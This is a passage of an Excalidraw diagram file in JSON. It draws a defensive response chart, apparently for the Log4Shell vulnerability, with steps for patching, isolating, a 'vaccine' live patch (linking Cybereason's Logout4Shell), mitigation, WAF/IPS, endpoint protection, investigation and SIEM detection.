105 | "baseline": 53.99897159011915,
106 | "containerId": null,
107 | "originalText": "First line of defense\nBlock / prevent before exploitation"
108 | },
109 | {
110 | "type": "text",
111 | "version": 342,
112 | "versionNonce": 1889407936,
113 | "isDeleted": false,
114 | "id": "W2io7L4z7Wr9KLen_e_tx",
115 | "fillStyle": "hachure",
116 | "strokeWidth": 1,
117 | "strokeStyle": "dashed",
118 | "roughness": 1,
119 | "opacity": 100,
120 | "angle": 0,
121 | "x": 114.75,
122 | "y": 986.6756433980631,
123 | "strokeColor": "#364fc7",
124 | "backgroundColor": "transparent",
125 | "width": 460.7925954488579,
126 | "height": 63.99897159011915,
127 | "seed": 837281856,
128 | "groupIds": [],
129 | "strokeSharpness": "sharp",
130 | "boundElements": [],
131 | "updated": 1639775213769,
132 | "fontSize": 25.599588636047667,
133 | "fontFamily": 1,
134 | "text": "Second line of defense\nMitigate after exploitation attempt",
135 | "baseline": 53.99897159011915,
136 | "textAlign": "left",
137 | "verticalAlign": "top",
138 | "containerId": null,
139 | "originalText": "Second line of defense\nMitigate after exploitation attempt"
140 | },
141 | {
142 | "type": "rectangle",
143 | "version": 174,
144 | "versionNonce": 2127431744,
145 | "isDeleted": false,
146 | "id": "bIs-X4tkZ5FiKhZ_A1t5K",
147 | "fillStyle": "hachure",
148 | "strokeWidth": 1,
149 | "strokeStyle": "solid",
150 | "roughness": 1,
151 | "opacity": 100,
152 | "angle": 0,
153 | "x": 262.25,
154 | "y": -29.750000000000014,
155 | "strokeColor": "#000000",
156 | "backgroundColor": "transparent",
157 | "width": 257.5,
158 | "height": 75,
159 | "seed": 174686272,
160 | "groupIds": [],
161 | "strokeSharpness": "sharp",
162 | "boundElements": [],
163 | "updated": 1639775213769
164 | },
165 | {
166 | "type": "text",
167 | "version": 186,
168 | "versionNonce": 589667264,
169 | "isDeleted": false,
170 | "id": "Pu7vmeyr_rwCynH5a6OTK",
171 | "fillStyle": "hachure",
172 | "strokeWidth": 1,
173 | "strokeStyle": "solid",
174 | "roughness": 1,
175 | "opacity": 100,
176 | "angle": 0,
177 | "x": 340.5,
178 | "y": -20.000000000000014,
179 | "strokeColor": "#000000",
180 | "backgroundColor": "transparent",
181 | "width": 101,
182 | "height": 25,
183 | "seed": 1260233664,
184 | "groupIds": [],
185 | "strokeSharpness": "sharp",
186 | "boundElements": [],
187 | "updated": 1639775213769,
188 | "fontSize": 20,
189 | "fontFamily": 1,
190 | "text": "Version 1.0",
191 | "baseline": 18,
192 | "textAlign": "center",
193 | "verticalAlign": "top",
194 | "containerId": null,
195 | "originalText": "Version 1.0"
196 | },
197 | {
198 | "type": "rectangle",
199 | "version": 153,
200 | "versionNonce": 1080229952,
201 | "isDeleted": false,
202 | "id": "2GulcqxwG_RiJBhOMkNPN",
203 | "fillStyle": "hachure",
204 | "strokeWidth": 1,
205 | "strokeStyle": "solid",
206 | "roughness": 1,
207 | "opacity": 100,
208 | "angle": 0,
209 | "x": 331,
210 | "y": 13.999999999999986,
211 | "strokeColor": "#000000",
212 | "backgroundColor": "#000000",
213 | "width": 115,
214 | "height": 26.25,
215 | "seed": 969898048,
216 | "groupIds": [],
217 | "strokeSharpness": "sharp",
218 | "boundElements": [],
219 | "updated": 1639775213769
220 | },
221 | {
222 | "type": "text",
223 | "version": 146,
224 | "versionNonce": 729555904,
225 | "isDeleted": false,
226 | "id": "QPzdf9CW3yDX53mB2CsIA",
227 | "fillStyle": "hachure",
228 | "strokeWidth": 1,
229 | "strokeStyle": "solid",
230 | "roughness": 1,
231 | "opacity": 100,
232 | "angle": 0,
233 | "x": 332,
234 | "y": 16.249999999999986,
235 | "strokeColor": "#000000",
236 | "backgroundColor": "#000000",
237 | "width": 113,
238 | "height": 25,
239 | "seed": 657664960,
240 | "groupIds": [],
241 | "strokeSharpness": "sharp",
242 | "boundElements": [],
243 | "updated": 1639775213769,
244 | "fontSize": 20,
245 | "fontFamily": 1,
246 | "text": "TLP:WHITE",
247 | "baseline": 18,
248 | "textAlign": "center",
249 | "verticalAlign": "top",
250 | "containerId": null,
251 | "originalText": ""
252 | },
253 | {
254 | "id": "f952sVmGsO9Z4OiOFtObz",
255 | "type": "rectangle",
256 | "x": 1106.734059646845,
257 | "y": 94.52997943180243,
258 | "width": 269,
259 | "height": 110,
260 | "angle": 0,
261 | "strokeColor": "#c92a2a",
262 | "backgroundColor": "transparent",
263 | "fillStyle": "hachure",
264 | "strokeWidth": 1,
265 | "strokeStyle": "dashed",
266 | "roughness": 1,
267 | "opacity": 100,
268 | "groupIds": [],
269 | "strokeSharpness": "sharp",
270 | "seed": 2008887360,
271 | "version": 641,
272 | "versionNonce": 1956182080,
273 | "isDeleted": false,
274 | "boundElements": [
275 | {
276 | "type": "text",
277 | "id": "UvNVpKk_AU_uXr_yF7NiT"
278 | }
279 | ],
280 | "updated": 1639775213769
281 | },
282 | {
283 | "id": "UvNVpKk_AU_uXr_yF7NiT",
284 | "type": "text",
285 | "x": 1136.6355000000003,
286 | "y": 136.4287500000001,
287 | "width": 209,
288 | "height": 25,
289 | "angle": 0,
290 | "strokeColor": "#c92a2a",
291 | "backgroundColor": "transparent",
292 | "fillStyle": "hachure",
293 | "strokeWidth": 1,
294 | "strokeStyle": "dashed",
295 | "roughness": 1,
296 | "opacity": 100,
297 | "groupIds": [],
298 | "strokeSharpness": "sharp",
299 | "seed": 1911634880,
300 | "version": 516,
301 | "versionNonce": 2009181120,
302 | "isDeleted": false,
303 | "boundElements": null,
304 | "updated": 1639775213769,
305 | "text": "WAF/CDN",
306 | "fontSize": 20,
307 | "fontFamily": 1,
308 | "textAlign": "center",
309 | "verticalAlign": "middle",
310 | "baseline": 18,
311 | "containerId": "f952sVmGsO9Z4OiOFtObz",
312 | "originalText": "WAF/CDN"
313 | },
314 | {
315 | "id": "u5FiVXeDz9ghORk_u5j51",
316 | "type": "rectangle",
317 | "x": 139.06960920424513,
318 | "y": 93.24999999999999,
319 | "width": 170.23726442971682,
320 | "height": 110,
321 | "angle": 0,
322 | "strokeColor": "#c92a2a",
323 | "backgroundColor": "transparent",
324 | "fillStyle": "hachure",
325 | "strokeWidth": 1,
326 | "strokeStyle": "dashed",
327 | "roughness": 1,
328 | "opacity": 100,
329 | "groupIds": [],
330 | "strokeSharpness": "sharp",
331 | "seed": 551795648,
332 | "version": 392,
333 | "versionNonce": 525332544,
334 | "isDeleted": false,
335 | "boundElements": [
336 | {
337 | "type": "text",
338 | "id": "us243Lv2K0OC2V0OJVTGl"
339 | }
340 | ],
341 | "updated": 1639775213769
342 | },
343 | {
344 | "id": "us243Lv2K0OC2V0OJVTGl",
345 | "type": "text",
346 | "x": 169.18849999999998,
347 | "y": 135.14875000000012,
348 | "width": 110,
349 | "height": 25,
350 | "angle": 0,
351 | "strokeColor": "#c92a2a",
352 | "backgroundColor": "transparent",
353 | "fillStyle": "hachure",
354 | "strokeWidth": 1,
355 | "strokeStyle": "dashed",
356 | "roughness": 1,
357 | "opacity": 100,
358 | "groupIds": [],
359 | "strokeSharpness": "sharp",
360 | "seed": 1679881152,
361 | "version": 318,
362 | "versionNonce": 840315840,
363 | "isDeleted": false,
364 | "boundElements": null,
365 | "updated": 1639775213770,
366 | "text": "#1 PATCH",
367 | "fontSize": 20,
368 | "fontFamily": 1,
369 | "textAlign": "center",
370 | "verticalAlign": "middle",
371 | "baseline": 18,
372 | "containerId": "u5FiVXeDz9ghORk_u5j51",
373 | "originalText": "#1 PATCH"
374 | },
375 | {
376 | "id": "6sjUuI-WXOo7gzxtg9RdW",
377 | "type": "line",
378 | "x": 1059.5519797946422,
379 | "y": 99.36980887423661,
380 | "width": 1.750042099236329,
381 | "height": 952.3610610097963,
382 | "angle": 0,
383 | "strokeColor": "#000000",
384 | "backgroundColor": "transparent",
385 | "fillStyle": "hachure",
386 | "strokeWidth": 1,
387 | "strokeStyle": "dashed",
388 | "roughness": 1,
389 | "opacity": 100,
390 | "groupIds": [],
391 | "strokeSharpness": "round",
392 | "seed": 1379224512,
393 | "version": 243,
394 | "versionNonce": 1214769216,
395 | "isDeleted": false,
396 | "boundElements": null,
397 | "updated": 1639775213770,
398 | "points": [
399 | [
400 | 0,
401 | 0
402 | ],
403 | [
404 | -1.750042099236329,
405 | 952.3610610097963
406 | ]
407 | ],
408 | "lastCommittedPoint": null,
409 | "startBinding": null,
410 | "endBinding": null,
411 | "startArrowhead": null,
412 | "endArrowhead": null
413 | },
414 | {
415 | "id": "sR_n049nx3PwZ4RpMmyQ-",
416 | "type": "text",
417 | "x": 1077.5997214026288,
418 | "y": 1015.2619252034037,
419 | "width": 212.26553184465985,
420 | "height": 55.27748225121354,
421 | "angle": 0,
422 | "strokeColor": "#862e9c",
423 | "backgroundColor": "transparent",
424 | "fillStyle": "hachure",
425 | "strokeWidth": 1,
426 | "strokeStyle": "dashed",
427 | "roughness": 1,
428 | "opacity": 100,
429 | "groupIds": [],
430 | "strokeSharpness": "sharp",
431 | "seed": 1210302528,
432 | "version": 175,
433 | "versionNonce": 1658815424,
434 | "isDeleted": false,
435 | "boundElements": null,
436 | "updated": 1639775219978,
437 | "text": "Detection",
438 | "fontSize": 44.22198580097085,
439 | "fontFamily": 1,
440 | "textAlign": "left",
441 | "verticalAlign": "top",
442 | "baseline": 38.27748225121354,
443 | "containerId": null,
444 | "originalText": "Detection"
445 | },
446 | {
447 | "id": "mFlM-xTMrc8KXxnBlo-Kk",
448 | "type": "text",
449 | "x": 833.5352607470559,
450 | "y": 1015.5854930338044,
451 | "width": 195.46821898940547,
452 | "height": 48.38322252213006,
453 | "angle": 0,
454 | "strokeColor": "#0b7285",
455 | "backgroundColor": "transparent",
456 | "fillStyle": "hachure",
457 | "strokeWidth": 1,
458 | "strokeStyle": "dashed",
459 | "roughness": 1,
460 | "opacity": 100,
461 | "groupIds": [],
462 | "strokeSharpness": "sharp",
463 | "seed": 26028992,
464 | "version": 185,
465 | "versionNonce": 1164723136,
466 | "isDeleted": false,
467 | "boundElements": null,
468 | "updated": 1639775213770,
469 | "text": "Prevention",
470 | "fontSize": 38.70657801770407,
471 | "fontFamily": 1,
472 | "textAlign": "left",
473 | "verticalAlign": "top",
474 | "baseline": 34.38322252213006,
475 | "containerId": null,
476 | "originalText": "Prevention"
477 | },
478 | {
479 | "type": "rectangle",
480 | "version": 759,
481 | "versionNonce": 1228593216,
482 | "isDeleted": false,
483 | "id": "OfeGdAfaUIgkhzvMbnFM2",
484 | "fillStyle": "hachure",
485 | "strokeWidth": 1,
486 | "strokeStyle": "dashed",
487 | "roughness": 1,
488 | "opacity": 100,
489 | "angle": 0,
490 | "x": 359.22607147425504,
491 | "y": 95.1699691477035,
492 | "strokeColor": "#c92a2a",
493 | "backgroundColor": "transparent",
494 | "width": 214,
495 | "height": 110,
496 | "seed": 186039232,
497 | "groupIds": [],
498 | "strokeSharpness": "sharp",
499 | "boundElements": [
500 | {
501 | "id": "bq4U_UKrEvwY3uV9h4aK7",
502 | "type": "text"
503 | },
504 | {
505 | "type": "text",
506 | "id": "bq4U_UKrEvwY3uV9h4aK7"
507 | }
508 | ],
509 | "updated": 1639775213770
510 | },
511 | {
512 | "type": "text",
513 | "version": 490,
514 | "versionNonce": 514706368,
515 | "isDeleted": false,
516 | "id": "bq4U_UKrEvwY3uV9h4aK7",
517 | "fillStyle": "hachure",
518 | "strokeWidth": 1,
519 | "strokeStyle": "dashed",
520 | "roughness": 1,
521 | "opacity": 100,
522 | "angle": 0,
523 | "x": 389.10474999999997,
524 | "y": 137.0687500000001,
525 | "strokeColor": "#c92a2a",
526 | "backgroundColor": "transparent",
527 | "width": 154,
528 | "height": 25,
529 | "seed": 1670635584,
530 | "groupIds": [],
531 | "strokeSharpness": "sharp",
532 | "boundElements": [],
533 | "updated": 1639775213770,
534 | "fontSize": 20,
535 | "fontFamily": 1,
536 | "text": "#2 ISOLATE",
537 | "baseline": 18,
538 | "textAlign": "center",
539 | "verticalAlign": "middle",
540 | "containerId": "OfeGdAfaUIgkhzvMbnFM2",
541 | "originalText": "#2 ISOLATE"
542 | },
543 | {
544 | "type": "rectangle",
545 | "version": 924,
546 | "versionNonce": 767368128,
547 | "isDeleted": false,
548 | "id": "EN8H39pyEHWyI8JM2pF-m",
549 | "fillStyle": "hachure",
550 | "strokeWidth": 1,
551 | "strokeStyle": "dashed",
552 | "roughness": 1,
553 | "opacity": 100,
554 | "angle": 0,
555 | "x": 598.1520915280156,
556 | "y": 95.13998971590131,
557 | "strokeColor": "#c92a2a",
558 | "backgroundColor": "transparent",
559 | "width": 198.3968119293694,
560 | "height": 110,
561 | "seed": 206989376,
562 | "groupIds": [],
563 | "strokeSharpness": "sharp",
564 | "boundElements": [
565 | {
566 | "id": "2fFte5I6ZPLUdll9DBdRJ",
567 | "type": "text"
568 | },
569 | {
570 | "id": "2fFte5I6ZPLUdll9DBdRJ",
571 | "type": "text"
572 | },
573 | {
574 | "type": "text",
575 | "id": "2fFte5I6ZPLUdll9DBdRJ"
576 | }
577 | ],
578 | "updated": 1639775315093
579 | },
580 | {
581 | "type": "text",
582 | "version": 641,
583 | "versionNonce": 1828945984,
584 | "isDeleted": false,
585 | "id": "2fFte5I6ZPLUdll9DBdRJ",
586 | "fillStyle": "hachure",
587 | "strokeWidth": 1,
588 | "strokeStyle": "dashed",
589 | "roughness": 1,
590 | "opacity": 100,
591 | "angle": 0,
592 | "x": 628.3510000000001,
593 | "y": 137.0387500000001,
594 | "strokeColor": "#c92a2a",
595 | "backgroundColor": "transparent",
596 | "width": 138,
597 | "height": 25,
598 | "seed": 1490238400,
599 | "groupIds": [],
600 | "strokeSharpness": "sharp",
601 | "boundElements": [],
602 | "updated": 1639775315093,
603 | "fontSize": 20,
604 | "fontFamily": 1,
605 | "text": "#3 VACCINE",
606 | "baseline": 18,
607 | "textAlign": "center",
608 | "verticalAlign": "middle",
609 | "containerId": "EN8H39pyEHWyI8JM2pF-m",
610 | "originalText": "#3 VACCINE"
611 | },
612 | {
613 | "type": "rectangle",
614 | "version": 808,
615 | "versionNonce": 101828672,
616 | "isDeleted": false,
617 | "id": "8JP6rU0LrHNSc5uCF1Jok",
618 | "fillStyle": "hachure",
619 | "strokeWidth": 1,
620 | "strokeStyle": "dashed",
621 | "roughness": 1,
622 | "opacity": 100,
623 | "angle": 0,
624 | "x": 1414.5691129953184,
625 | "y": 95.1699691477035,
626 | "strokeColor": "#c92a2a",
627 | "backgroundColor": "transparent",
628 | "width": 270.0756601103026,
629 | "height": 108.7982517032025,
630 | "seed": 243381184,
631 | "groupIds": [],
632 | "strokeSharpness": "sharp",
633 | "boundElements": [
634 | {
635 | "id": "0sAWw4RV3TBM_-7MEGOBs",
636 | "type": "text"
637 | },
638 | {
639 | "type": "text",
640 | "id": "0sAWw4RV3TBM_-7MEGOBs"
641 | }
642 | ],
643 | "updated": 1639775213770
644 | },
645 | {
646 | "type": "text",
647 | "version": 655,
648 | "versionNonce": 1929239488,
649 | "isDeleted": false,
650 | "id": "0sAWw4RV3TBM_-7MEGOBs",
651 | "fillStyle": "hachure",
652 | "strokeWidth": 1,
653 | "strokeStyle": "dashed",
654 | "roughness": 1,
655 | "opacity": 100,
656 | "angle": 0,
657 | "x": 1444.5691129953184,
658 | "y": 137.06909499930475,
659 | "strokeColor": "#c92a2a",
660 | "backgroundColor": "transparent",
661 | "width": 210.07566011030258,
662 | "height": 25,
663 | "seed": 1517578304,
664 | "groupIds": [],
665 | "strokeSharpness": "sharp",
666 | "boundElements": [],
667 | "updated": 1639775213770,
668 | "fontSize": 20,
669 | "fontFamily": 1,
670 | "text": "IPS",
671 | "baseline": 18,
672 | "textAlign": "center",
673 | "verticalAlign": "middle",
674 | "containerId": "8JP6rU0LrHNSc5uCF1Jok",
675 | "originalText": "IPS"
676 | },
677 | {
678 | "type": "rectangle",
679 | "version": 1150,
680 | "versionNonce": 690929728,
681 | "isDeleted": false,
682 | "id": "lQ50J00GPYxhAfMthTmX1",
683 | "fillStyle": "solid",
684 | "strokeWidth": 1,
685 | "strokeStyle": "dashed",
686 | "roughness": 1,
687 | "opacity": 100,
688 | "angle": 0,
689 | "x": 856.4980807294805,
690 | "y": 564.9224206191775,
691 | "strokeColor": "#364fc7",
692 | "backgroundColor": "#ffffff",
693 | "width": 380.1538912453079,
694 | "height": 140.797737498262,
695 | "seed": 1850160064,
696 | "groupIds": [],
697 | "strokeSharpness": "sharp",
698 | "boundElements": [
699 | {
700 | "id": "QPjukRS8lxB7lHmLfb1AO",
701 | "type": "text"
702 | },
703 | {
704 | "id": "QPjukRS8lxB7lHmLfb1AO",
705 | "type": "text"
706 | },
707 | {
708 | "id": "QPjukRS8lxB7lHmLfb1AO",
709 | "type": "text"
710 | },
711 | {
712 | "type": "text",
713 | "id": "QPjukRS8lxB7lHmLfb1AO"
714 | }
715 | ],
716 | "updated": 1639775213770
717 | },
718 | {
719 | "type": "text",
720 | "version": 851,
721 | "versionNonce": 1447846848,
722 | "isDeleted": false,
723 | "id": "QPjukRS8lxB7lHmLfb1AO",
724 | "fillStyle": "hachure",
725 | "strokeWidth": 1,
726 | "strokeStyle": "dashed",
727 | "roughness": 1,
728 | "opacity": 100,
729 | "angle": 0,
730 | "x": 886.4980807294805,
731 | "y": 610.3212893683085,
732 | "strokeColor": "#364fc7",
733 | "backgroundColor": "transparent",
734 | "width": 320.1538912453079,
735 | "height": 50,
736 | "seed": 1673979968,
737 | "groupIds": [],
738 | "strokeSharpness": "sharp",
739 | "boundElements": [],
740 | "updated": 1639775213770,
741 | "fontSize": 20,
742 | "fontFamily": 1,
743 | "text": "ENDPOINT\nXDR/EPP",
744 | "baseline": 43,
745 | "textAlign": "center",
746 | "verticalAlign": "middle",
747 | "containerId": "lQ50J00GPYxhAfMthTmX1",
748 | "originalText": "ENDPOINT\nXDR/EPP"
749 | },
750 | {
751 | "type": "rectangle",
752 | "version": 1303,
753 | "versionNonce": 1307359296,
754 | "isDeleted": false,
755 | "id": "CqNdx62OBlHtjpXfEZu0T",
756 | "fillStyle": "hachure",
757 | "strokeWidth": 1,
758 | "strokeStyle": "dashed",
759 | "roughness": 1,
760 | "opacity": 100,
761 | "angle": 0,
762 | "x": 1243.5615194744405,
763 | "y": 565.6223691986833,
764 | "strokeColor": "#364fc7",
765 | "backgroundColor": "transparent",
766 | "width": 507.00000000000006,
767 | "height": 140.797737498262,
768 | "seed": 1547135040,
769 | "groupIds": [],
770 | "strokeSharpness": "sharp",
771 | "boundElements": [
772 | {
773 | "id": "ddb5hY7wF8ipDzXleyIkV",
774 | "type": "text"
775 | },
776 | {
777 | "id": "ddb5hY7wF8ipDzXleyIkV",
778 | "type": "text"
779 | },
780 | {
781 | "id": "ddb5hY7wF8ipDzXleyIkV",
782 | "type": "text"
783 | },
784 | {
785 | "id": "ddb5hY7wF8ipDzXleyIkV",
786 | "type": "text"
787 | },
788 | {
789 | "type": "text",
790 | "id": "ddb5hY7wF8ipDzXleyIkV"
791 | }
792 | ],
793 | "updated": 1639775213770
794 | },
795 | {
796 | "type": "text",
797 | "version": 1073,
798 | "versionNonce": 1586097088,
799 | "isDeleted": false,
800 | "id": "ddb5hY7wF8ipDzXleyIkV",
801 | "fillStyle": "hachure",
802 | "strokeWidth": 1,
803 | "strokeStyle": "dashed",
804 | "roughness": 1,
805 | "opacity": 100,
806 | "angle": 0,
807 | "x": 1273.5625,
808 | "y": 611.0212500000001,
809 | "strokeColor": "#364fc7",
810 | "backgroundColor": "transparent",
811 | "width": 447,
812 | "height": 50,
813 | "seed": 864172992,
814 | "groupIds": [],
815 | "strokeSharpness": "sharp",
816 | "boundElements": [],
817 | "updated": 1639775213770,
818 | "fontSize": 20,
819 | "fontFamily": 1,
820 | "text": "INVESTIGATE\nPRESERVE EVIDENCE ",
821 | "baseline": 43,
822 | "textAlign": "center",
823 | "verticalAlign": "middle",
824 | "containerId": "CqNdx62OBlHtjpXfEZu0T",
825 | "originalText": "INVESTIGATE\nPRESERVE EVIDENCE "
826 | },
827 | {
828 | "type": "rectangle",
829 | "version": 1267,
830 | "versionNonce": 405516352,
831 | "isDeleted": false,
832 | "id": "jIQL8E-5ZhEgZ-jPJClDd",
833 | "fillStyle": "hachure",
834 | "strokeWidth": 1,
835 | "strokeStyle": "dashed",
836 | "roughness": 1,
837 | "opacity": 100,
838 | "angle": 0,
839 | "x": 1764.0034978773688,
840 | "y": 570.6823280622888,
841 | "strokeColor": "#364fc7",
842 | "backgroundColor": "transparent",
843 | "width": 366.07411749548146,
844 | "height": 140.797737498262,
845 | "seed": 896954432,
846 | "groupIds": [],
847 | "strokeSharpness": "sharp",
848 | "boundElements": [
849 | {
850 | "id": "wUm0A9T02ooH6J_FunPIE",
851 | "type": "text"
852 | },
853 | {
854 | "id": "wUm0A9T02ooH6J_FunPIE",
855 | "type": "text"
856 | },
857 | {
858 | "id": "wUm0A9T02ooH6J_FunPIE",
859 | "type": "text"
860 | },
861 | {
862 | "id": "wUm0A9T02ooH6J_FunPIE",
863 | "type": "text"
864 | },
865 | {
866 | "id": "wUm0A9T02ooH6J_FunPIE",
867 | "type": "text"
868 | },
869 | {
870 | "type": "text",
871 | "id": "wUm0A9T02ooH6J_FunPIE"
872 | }
873 | ],
874 | "updated": 1639775213770
875 | },
876 | {
877 | "type": "text",
878 | "version": 1014,
879 | "versionNonce": 366375872,
880 | "isDeleted": false,
881 | "id": "wUm0A9T02ooH6J_FunPIE",
882 | "fillStyle": "hachure",
883 | "strokeWidth": 1,
884 | "strokeStyle": "dashed",
885 | "roughness": 1,
886 | "opacity": 100,
887 | "angle": 0,
888 | "x": 1794.0034978773688,
889 | "y": 616.0811968114198,
890 | "strokeColor": "#364fc7",
891 | "backgroundColor": "transparent",
892 | "width": 306.07411749548146,
893 | "height": 50,
894 | "seed": 1469559744,
895 | "groupIds": [],
896 | "strokeSharpness": "sharp",
897 | "boundElements": [],
898 | "updated": 1639775213771,
899 | "fontSize": 20,
900 | "fontFamily": 1,
901 | "text": "SIEM\nCORRELATION RULE",
902 | "baseline": 43,
903 | "textAlign": "center",
904 | "verticalAlign": "middle",
905 | "containerId": "jIQL8E-5ZhEgZ-jPJClDd",
906 | "originalText": "SIEM\nCORRELATION RULE"
907 | },
908 | {
909 | "type": "rectangle",
910 | "version": 1312,
911 | "versionNonce": 801876032,
912 | "isDeleted": false,
913 | "id": "bvE03dboSek0F4Rblmaxy",
914 | "fillStyle": "hachure",
915 | "strokeWidth": 1,
916 | "strokeStyle": "dashed",
917 | "roughness": 1,
918 | "opacity": 100,
919 | "angle": 0,
920 | "x": 496.8238603930117,
921 | "y": 563.0024514714747,
922 | "strokeColor": "#364fc7",
923 | "backgroundColor": "transparent",
924 | "width": 343.0344877230387,
925 | "height": 140.797737498262,
926 | "seed": 661132224,
927 | "groupIds": [],
928 | "strokeSharpness": "sharp",
929 | "boundElements": [
930 | {
931 | "id": "CMLOqKbtvi1NLeMwx7XAv",
932 | "type": "text"
933 | },
934 | {
935 | "id": "CMLOqKbtvi1NLeMwx7XAv",
936 | "type": "text"
937 | },
938 | {
939 | "id": "CMLOqKbtvi1NLeMwx7XAv",
940 | "type": "text"
941 | },
942 | {
943 | "id": "CMLOqKbtvi1NLeMwx7XAv",
944 | "type": "text"
945 | },
946 | {
947 | "id": "CMLOqKbtvi1NLeMwx7XAv",
948 | "type": "text"
949 | },
950 | {
951 | "type": "text",
952 | "id": "CMLOqKbtvi1NLeMwx7XAv"
953 | }
954 | ],
955 | "updated": 1639775213771
956 | },
957 | {
958 | "type": "text",
959 | "version": 1126,
960 | "versionNonce": 1112669120,
961 | "isDeleted": false,
962 | "id": "CMLOqKbtvi1NLeMwx7XAv",
963 | "fillStyle": "hachure",
964 | "strokeWidth": 1,
965 | "strokeStyle": "dashed",
966 | "roughness": 1,
967 | "opacity": 100,
968 | "angle": 0,
969 | "x": 526.8407499999998,
970 | "y": 595.9012500000001,
971 | "strokeColor": "#364fc7",
972 | "backgroundColor": "transparent",
973 | "width": 283,
974 | "height": 50,
975 | "seed": 1906575424,
976 | "groupIds": [],
977 | "strokeSharpness": "sharp",
978 | "boundElements": [],
979 | "updated": 1639775213771,
980 | "fontSize": 20,
981 | "fontFamily": 1,
982 | "text": "FILTER INTERNAL\nSENSITIVE ASSETS",
983 | "baseline": 43,
984 | "textAlign": "center",
985 | "verticalAlign": "middle",
986 | "containerId": "bvE03dboSek0F4Rblmaxy",
987 | "originalText": "FILTER INTERNAL\nSENSITIVE ASSETS"
988 | },
989 | {
990 | "id": "pRAJQscNEO55-0GSP_mSP",
991 | "type": "rectangle",
992 | "x": 598.7920812439177,
993 | "y": 237.85769636186723,
994 | "width": 206.0766885201836,
995 | "height": 138.2377786346574,
996 | "angle": 0,
997 | "strokeColor": "#000000",
998 | "backgroundColor": "#ffffff",
999 | "fillStyle": "solid",
1000 | "strokeWidth": 1,
1001 | "strokeStyle": "dotted",
1002 | "roughness": 1,
1003 | "opacity": 100,
1004 | "groupIds": [],
1005 | "strokeSharpness": "sharp",
1006 | "seed": 1934361536,
1007 | "version": 263,
1008 | "versionNonce": 1998824384,
1009 | "isDeleted": false,
1010 | "boundElements": null,
1011 | "updated": 1639775315093
1012 | },
1013 | {
1014 | "id": "qdfIgz6uhvffnWAKImBI1",
1015 | "type": "text",
1016 | "x": 607.7519372665345,
1017 | "y": 326.1762771562321,
1018 | "width": 193,
1019 | "height": 28,
1020 | "angle": 0,
1021 | "strokeColor": "#000000",
1022 | "backgroundColor": "#ffffff",
1023 | "fillStyle": "solid",
1024 | "strokeWidth": 1,
1025 | "strokeStyle": "dashed",
1026 | "roughness": 1,
1027 | "opacity": 100,
1028 | "groupIds": [],
1029 | "strokeSharpness": "sharp",
1030 | "seed": 2120056896,
1031 | "version": 454,
1032 | "versionNonce": 959019072,
1033 | "isDeleted": false,
1034 | "boundElements": null,
1035 | "updated": 1639775315093,
1036 | "text": "https://github.com/Cybereason/\nLogout4Shell",
1037 | "fontSize": 10.989198916379799,
1038 | "fontFamily": 3,
1039 | "textAlign": "left",
1040 | "verticalAlign": "top",
1041 | "baseline": 25,
1042 | "containerId": null,
1043 | "originalText": "https://github.com/Cybereason/\nLogout4Shell"
1044 | },
1045 | {
1046 | "id": "abRWh9bjq3dg4vCAqj8q_",
1047 | "type": "text",
1048 | "x": 601.3520401075219,
1049 | "y": 246.81755238448358,
1050 | "width": 198.39681192936942,
1051 | "height": 58.35200350863805,
1052 | "angle": 0,
1053 | "strokeColor": "#000000",
1054 | "backgroundColor": "#ffffff",
1055 | "fillStyle": "solid",
1056 | "strokeWidth": 1,
1057 | "strokeStyle": "dashed",
1058 | "roughness": 1,
1059 | "opacity": 100,
1060 | "groupIds": [],
1061 | "strokeSharpness": "sharp",
1062 | "seed": 2046616512,
1063 | "version": 317,
1064 | "versionNonce": 1652108224,
1065 | "isDeleted": false,
1066 | "boundElements": null,
1067 | "updated": 1639775315093,
1068 | "text": "A \"vaccine\" allows to live\npatch any application by\nexploiting the vulnerability",
1069 | "fontSize": 15.560534268970153,
1070 | "fontFamily": 1,
1071 | "textAlign": "center",
1072 | "verticalAlign": "top",
1073 | "baseline": 52.35200350863805,
1074 | "containerId": null,
1075 | "originalText": "A \"vaccine\" allows to live\npatch any application by\nexploiting the vulnerability"
1076 | },
1077 | {
1078 | "type": "rectangle",
1079 | "version": 1052,
1080 | "versionNonce": 296849472,
1081 | "isDeleted": false,
1082 | "id": "fLSWb6ysdctjonqOBnXai",
1083 | "fillStyle": "hachure",
1084 | "strokeWidth": 1,
1085 | "strokeStyle": "dashed",
1086 | "roughness": 1,
1087 | "opacity": 100,
1088 | "angle": 0,
1089 | "x": 824.4985949344216,
1090 | "y": 93.88998971590131,
1091 | "strokeColor": "#c92a2a",
1092 | "backgroundColor": "transparent",
1093 | "width": 221.436441701812,
1094 | "height": 110,
1095 | "seed": 737162176,
1096 | "groupIds": [],
1097 | "strokeSharpness": "sharp",
1098 | "boundElements": [
1099 | {
1100 | "id": "VufhYpPQd2liAy9uDunP7",
1101 | "type": "text"
1102 | },
1103 | {
1104 | "id": "VufhYpPQd2liAy9uDunP7",
1105 | "type": "text"
1106 | },
1107 | {
1108 | "id": "VufhYpPQd2liAy9uDunP7",
1109 | "type": "text"
1110 | },
1111 | {
1112 | "type": "text",
1113 | "id": "VufhYpPQd2liAy9uDunP7"
1114 | }
1115 | ],
1116 | "updated": 1639775213771
1117 | },
1118 | {
1119 | "type": "text",
1120 | "version": 759,
1121 | "versionNonce": 1209963456,
1122 | "isDeleted": false,
1123 | "id": "VufhYpPQd2liAy9uDunP7",
1124 | "fillStyle": "hachure",
1125 | "strokeWidth": 1,
1126 | "strokeStyle": "dashed",
1127 | "roughness": 1,
1128 | "opacity": 100,
1129 | "angle": 0,
1130 | "x": 854.71675,
1131 | "y": 135.7887500000001,
1132 | "strokeColor": "#c92a2a",
1133 | "backgroundColor": "transparent",
1134 | "width": 161,
1135 | "height": 25,
1136 | "seed": 1898833984,
1137 | "groupIds": [],
1138 | "strokeSharpness": "sharp",
1139 | "boundElements": [],
1140 | "updated": 1639775213771,
1141 | "fontSize": 20,
1142 | "fontFamily": 1,
1143 | "text": "#4 MITIGATE",
1144 | "baseline": 18,
1145 | "textAlign": "center",
1146 | "verticalAlign": "middle",
1147 | "containerId": "fLSWb6ysdctjonqOBnXai",
1148 | "originalText": "#4 MITIGATE"
1149 | },
1150 | {
1151 | "type": "rectangle",
1152 | "version": 457,
1153 | "versionNonce": 2094834624,
1154 | "isDeleted": false,
1155 | "id": "s3foEZGNuENKTb3fu63FA",
1156 | "fillStyle": "solid",
1157 | "strokeWidth": 1,
1158 | "strokeStyle": "dotted",
1159 | "roughness": 1,
1160 | "opacity": 100,
1161 | "angle": 0,
